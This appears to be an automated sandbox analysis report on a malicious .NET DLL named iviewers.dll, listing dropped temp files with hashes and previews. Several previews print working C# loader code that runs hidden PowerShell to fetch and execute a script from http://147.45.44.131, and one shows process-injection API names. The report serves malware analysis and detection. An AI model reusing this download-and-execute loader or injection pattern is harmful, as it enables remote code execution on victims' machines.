                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.

                                                          C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.978571371837321
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIrG3fFGqiQCIFRVRMxTPICHyg4E2J5xAIrGw:pAu+H2LnCHhJ23fSv8qzxszICHhJ23fz
                                                          MD5:470ADC0FC254207480AA1FBB813E7F9F
                                                          SHA1:717512F32DF8A1A2D511A21AF29987EDC3D0943A
                                                          SHA-256:0E75466F00CE89C1565C09A5DC4182BC7E40E2BEB53DD6DD084DAF3FDF2D6164
                                                          SHA-512:B80A942E70AF5006F8E723E2DEB299CA00C72EE61C834217F952F0AA09EEF6201D36C1DBEC63FDFFB19BA435C1B744D35CBD7A2D6202100510E19D4105E5857A
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.9606062932641435
                                                          Encrypted:false
                                                          SSDEEP:48:6U1gJHpAUx0JNlbo7jhIB/4DMPvf/v1ul1a35q:IAUd790rP3Y3K
                                                          MD5:5CC857B37383E17E9DF41D4BB2117E19
                                                          SHA1:A73D88B6D9AECAFFE1C6C4357493B78A4126D5FE
                                                          SHA-256:1DBD6CC7CC8C77A906114BF79749BEEFF4A4F019DBAA576A09C2842B8D479F93
                                                          SHA-512:FB0056C827DA8003082D9F2B8D59E91ED7A3ADFFC241FEFEF6C735F5877D3C041FE3C5EBD24BC0A4E7DF78CEC3751CC4A97C5AF21654EE67578B9B03923C04DD
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...

                                                          C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.2506935777804165
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L560qZ60h4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdB60260h4Kax5DqBVKVrdFAMBJTH
                                                          MD5:F13244480E67538C1D9BCC7DDF5817C9
                                                          SHA1:3F489022BFAFB0041D69DFF0737D6F9A0CFB23A5
                                                          SHA-256:C37C0C668537FB9DF838F02BDBC15C96EABE0732DC63899529B18E1E9E4785C7
                                                          SHA-512:31249352E8FECD956F38C15458F3DABA0B36F84838A0925497C1204534D8323EC3EB8F9EA4D76DF0F363AD8372C0436E3F408DCEB4BCD210335189410086E93D
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0905578282271082
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqrPN5Dlq5J:+RI+ycuZhN9akSrPNnqX
                                                          MD5:46E80826969C3B21ED5C444F4CC5DC04
                                                          SHA1:8C092EEE34DE3761E4A6A1BB95B36820D35A4089
                                                          SHA-256:8DB3360D1A1CA03B292774CE6F7B539C3A9D0E7048503CF2093113C6E074602E
                                                          SHA-512:00E6078C9D7E88D0C5570AF097D45B9D7B747ECA09EDC7ABE542ADBE87050ADC3376D0CF138A39D2D613C87256E1CB6D20B2409C1241473EDD270C8222609827
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.n.j.g.a.w.j.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.n.j.g.a.w.j.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.

                                                          C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.991813240264389
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIaSP+1POaiQCIFRVRMxTPICHyg4E2J5xAIaq:pAu+H2LnCHhJ23fZ21zzxszICHhJ23fb
                                                          MD5:725F54B6D37F18EEE8BCB817D98F1029
                                                          SHA1:4C7CB48745FA1E34AF110D501A5789D6D5077AD8
                                                          SHA-256:CEE309D5C2257A58539BF6B5E27645DAE9D479F80CA0613F031DD1C6C43F010B
                                                          SHA-512:1AD532548D25053B3D4F7743B13DDE064FA4C9DA7D176D1B23DFAF501C85057240520CB610259CAC6952299EA70A26CB5FDEC196664BE19DE42E79A77E1AA206
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.951867598621192
                                                          Encrypted:false
                                                          SSDEEP:48:6/1gJHpAUb0JaElbo7jhIB/4DMPvfGv1ul9a3Bq:dAUJ790rP33fK
                                                          MD5:69322C2D496D7AEE3BA8057F243349FC
                                                          SHA1:852307AE56C8E633227296166EA1864C39EADE07
                                                          SHA-256:622EB048EC3585CFB2D1815657AB29EE486746F212A0EB424C215520B9EC10E1
                                                          SHA-512:D83693FADEBE54B96B2BCC71F4D01D5FF871A89F8119347AFFFBF041E25ABAB1D8C520BEAADD8B73E5D9447E5CB2976487636837BB234D910551616231867B05
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...

                                                          C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.222989122069287
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5xEzZxE84KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBiSKax5DqBVKVrdFAMBJTH
                                                          MD5:9F5B515CB33901FA3282925D42D4691F
                                                          SHA1:5F5F41F722560614A677BE9A68AC8AEC2F627683
                                                          SHA-256:54D15D9B19CEE62B7E50A4C6EB903C56C1E4E5C324B4A5C4147AFF505132B6F7
                                                          SHA-512:80EF54052F8EDEBC372F4D794FC7F9ACB1935D3A892984F486F321994637968C0A43EE12F5F8B34EE119368F23AD7126B8B96F18B61B3339C6B2503A69C3403E
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0979689713878416
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7YnqqaPN5Dlq5J:+RI+ycuZhNiakSaPNnqX
                                                          MD5:CD3F0B413ADD89FA0C41EB5FC0DF0BBF
                                                          SHA1:0CB75CC62C402C44BDB4B6252E20EC7A93F87035
                                                          SHA-256:2851FE538DB9E322F5129958F7FFE7C69FF77B57A4296AA19809983037AE68D8
                                                          SHA-512:9400A6B2CD0798050C30F35C58D11977DA92D24520CA694D059E18396765F0898C9D0F0A43D03360FAD92336F1A3F3B4F5A7F80738BDB3F614D337FF7BE6D5B6
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.k.y.4.h.e.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.k.k.y.4.h.e.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                          C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.966801679704727
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fnnHUzxszICHhJ23fnx:p37L/6KiP0ZPx
                                                          MD5:80208B74B8FA1CD7D178FABEFC659D25
                                                          SHA1:31BAB2750B473099D6A713C5F2A28FE86A58E67B
                                                          SHA-256:9C15BA0B985E39462177009DB93161A6D693AC46E1FE88CF0E7078965FAD2ABD
                                                          SHA-512:6D7F49B4F46572A8E516189E4C0DFCBE85AB62CE2F5F3CCCED48935EAF7714460F736071DFA222383D792DE8F11B62464F0DAEADDBA39AF6ACB05D90C4D11D91
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.661696653808497
                                                          Encrypted:false
                                                          SSDEEP:96:zbuaQZGQf9xPQ2pCa/u67hHJ89IhbpPrjzKcaEZRAH0ljILHqrv5MqLTzeNc+i0K:zCaQHf9WDa/u6NRj2cavUxd5MqDeNcp
                                                          MD5:591D576666D4959490A788E7A55C7EA4
                                                          SHA1:9F04784B5C11D896F4D34D5886029F06395DA69C
                                                          SHA-256:8D0522B6D078BD89FF1750DF8822820BD002CBF0BD85C9D8BCFD1B23DA314EC4
                                                          SHA-512:E69B8B41A89B49BB04482DD3320D9845D0460AF9C3C22FE390D9FAD48AB08D1AFE7B3184C6D7C10B45853613642987579EC3A6A8725E5E1489299FCA2B0A141D
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                                          C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.229375258388161
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KiP0ZPUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6Ki0sKax5DqBVKVrdFAMBJTH
                                                          MD5:68221AC289C8079A4A40A50B28EB1689
                                                          SHA1:16BBE74C819E585424C7E5BDAFC2D61352428532
                                                          SHA-256:856758E68BF40D1FFA1BAABD69D61B2FEF1B79CAD55431EC874E7DED0ACF9FDF
                                                          SHA-512:34D35231B613D02395EFC1F83D6DA1435BC8588D1F4BC08699E0A864AD3951E81D8E94218F20BB17DFA3FBE57C8D6D43D9EE988168F3DE6E7B234CD249BED86F
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1045785044066894
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7Ynqq7PN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                                                          MD5:5A4CE53FAF3AF0FA06F6B8B1A84F9627
                                                          SHA1:046415A7586164F3A7918DF612FA253ECFC2473A
                                                          SHA-256:3ACF8CAF45CE3749D99AA7DBCF936C018C41DC3BF6E9CF6A361766F48A29DB30
                                                          SHA-512:7715A3907F740A9A0D08F0FCD5CC31A5472B6C822C6EB6A21229C15CAE7ECA6D94381644DCA0C0BEA998E35D11B0E3121AE95EF966F14CE20FA879AA706DC268
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.

                                                          C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.972410822675697
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIqvB+v1HlaiQCIFRVRMxTPICHyg4E2J5xAIT:pAu+H2LnCHhJ23fq9zxszICHhJ23fqY
                                                          MD5:2ADF650FB05321CCB599F112ADD297C5
                                                          SHA1:A7041861EF07BF86981B0C8A384203A387072B9A
                                                          SHA-256:E207E54D342981D02AC6E2856B627B3203898DBC64B8D3DB4206688BE2126FF3
                                                          SHA-512:51D65C75FD23B1ED9F1CD83A871A23001DC14E871E4A68EE368FBF2FBA63C85E7CC59FC3C9A567D3F8624F4083E68034A5E5AD0412F120E9F46F26AEAD5E7312
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.952700462723094
                                                          Encrypted:false
                                                          SSDEEP:48:6W1gJHpAU50JLplbo7jhIB/4DMPvfSv1ulta3xq:qAUF790rP3D/K
                                                          MD5:A0CD0E695F9655617DBC02E70F44B40F
                                                          SHA1:641052917769E7BDA03117F65F1849A183998909
                                                          SHA-256:2BC87C4880CE5E4428B73C8D4D3F95B87A261B953E060908EB0E6702130B54DB
                                                          SHA-512:9DAEAE00BCBDD75F5EBFCD89B1884556E9A9223C2882E1CFF9CD83D15EC6177C45339CBFBEAC9CCD17FCDEEFD33D156E612B5BAE22AE8E6A11E6D9D59C315978
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...

                                                          C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.236158023523256
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5S9ZSNKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBS7SNKax5DqBVKVrdFAMBJTH
                                                          MD5:A3B717B1C57F6E09A56807F6188E1F64
                                                          SHA1:0813E7EF634C36A189D9EE19084B217B9F83C85D
                                                          SHA-256:A4DA6B875740FA34EFD1FE49182EB06CC460879E3F9EE72AC36A3C8047CD8705
                                                          SHA-512:E768A33A11D363C1CB61B58356503DCD9CCF9147DE4FAB9D4318E172C24B68BC59123645297FDDDA67AA6166193C9DA0AE17BFEFC2E54CF362F8FBDBA0618845
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):4.127229801084978
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 44.38%
                                                          • Generic .NET DLL/Assembly (238134/4) 10.55%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.09%
                                                          • Generic Win/DOS Executable (2004/3) 0.09%
                                                          File name:iviewers.dll
                                                          File size:9'216 bytes
                                                          MD5:021b791221db8fd3d93875f0a38ba5ef
                                                          SHA1:505389236008ff05d84ef543566355aca2b3eb61
                                                          SHA256:480d586ae595a2f7a47c20aee500758b03a596837b073ede049920d50fb24a05
